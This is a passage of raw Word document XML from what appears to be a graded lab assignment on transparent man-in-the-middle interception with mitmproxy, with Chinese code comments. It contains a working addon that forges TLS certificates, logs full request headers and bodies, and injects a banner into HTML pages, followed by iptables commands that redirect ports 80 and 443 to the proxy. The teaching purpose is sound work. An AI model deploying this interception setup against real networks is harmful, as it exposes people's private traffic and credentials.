        <w:t xml:space="preserve">    if sni in self.forged_cert:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ctx.log.info(f"拦截TLS握手：{sni}，使用伪造证书")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        cert = self.forged_cert[sni]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        data.context.cert = (cert["certfile"], cert["keyfile"])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def request(self, flow: http.HTTPFlow) -&gt; None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    """记录所有请求细节"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctx.log.info("-" * 50)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctx.log.info(f"拦截请求: {flow.request.method} {flow.request.pretty_url}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctx.log.info(f"头信息:\n{flow.request.headers}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if flow.request.content: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decoded = flow.request.content.decode("utf-8")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            ctx.log.info(f"请求主体:\n{decoded}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        except UnicodeDecodeError:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            ctx.log.warn("请求主体包含二进制数据")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def response(self, flow: http.HTTPFlow) -&gt; None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    """修改响应内容，注入警告横幅"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctx.log.info(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"拦截响应: {flow.response.status_code} {flow.request.pretty_url}"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content_type = flow.response.headers.get("content-type", "")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not content_type.lower().startswith("text/html"):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content = flow.response.content</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not content: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html = content.decode("utf-8")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    except UnicodeDecodeError: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# 注意：这里包含关键字 INTERCEPTED，供测试脚本检测</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    WARNING_HTML = """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- INTERCEPTED BY MITM PROXY --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div style='background:red;color:white;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                padding:10px;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                text-align:center;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                font-weight:bold;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                font-size:18px;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                position:fixed;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                top:0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                left:0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                right:0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                z-index:9999;'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        安全警告：您的流量已被拦截 (MITM Proxy) - INTERCEPTED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 xml:space="preserve">    # 在第一个 &lt;body&gt; 标签后注入</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    modified = re.sub(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        r"(&lt;body[^&gt;]*&gt;)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        r"\1" + WARNING_HTML,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        html,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        flags=re.IGNORECASE,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if modified != html:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        flow.response.text = modified  # mitmproxy 会自动处理编码/长度</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ctx.log.info("成功注入警告横幅")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">addons = [CertificateForger()]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###  Step 2.5: Set Up Traffic Redirection (2 pt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">```Shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. Enable IP forwarding</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo sysctl -w net.ipv4.ip_forward=1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo sysctl -w net.ipv6.conf.all.forwarding=1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. Disable ICMP redirects</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo sysctl -w net.ipv4.conf.all.send_redirects=0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. Flush existing rules</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -t nat -F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -t nat -F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. Create mitmproxy user to avoid loops</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo useradd --create-home mitmproxyuser || true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 5. Set up redirection rules (IPv4 and IPv6)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># For externally originated traffic (via PREROUTING):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># For locally originated traffic (via OUTPUT):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip6tables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># 6. Launch mitmproxy (run as dedicated user to avoid loops)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u mitmproxyuser -H bash -c 'mitmproxy --mode transparent --showhost --ssl-insecure --set block_global=false -s ~/mitm-custom.py'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># To restore normal networking if something goes wrong:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># sudo iptables -F &amp;&amp; sudo iptables -t nat -F &amp;&amp; sudo ip6tables -F &amp;&amp; sudo ip6tables -t nat -F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="47" w:name="Xf1903c742e7886b79d3c3be717204e0834fd6ad"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.6: Launch mitmproxy and Test Interception (1 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="264894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13033a93-bd67-4a13-b5da-c155f0b8cd6a/2c883156f3c4da48cbaea3166c9332a39ffc669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0" w:name="verification-and-testing-script"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Verification and Testing Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="28489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13033a93-bd67-4a13-b5da-c155f0b8cd6a/280ca3d8d183682b9acd67761be727440abe848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3997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13033a93-bd67-4a13-b5da-c155f0b8cd6a/d697043ddd9ebb9fca6e938eed08025b9821863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cleanup-script"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Cleanup Script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20" Target="media/rId20.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId49" Target="media/rId49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2025-12-04T17:18:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-04T17:18:23Z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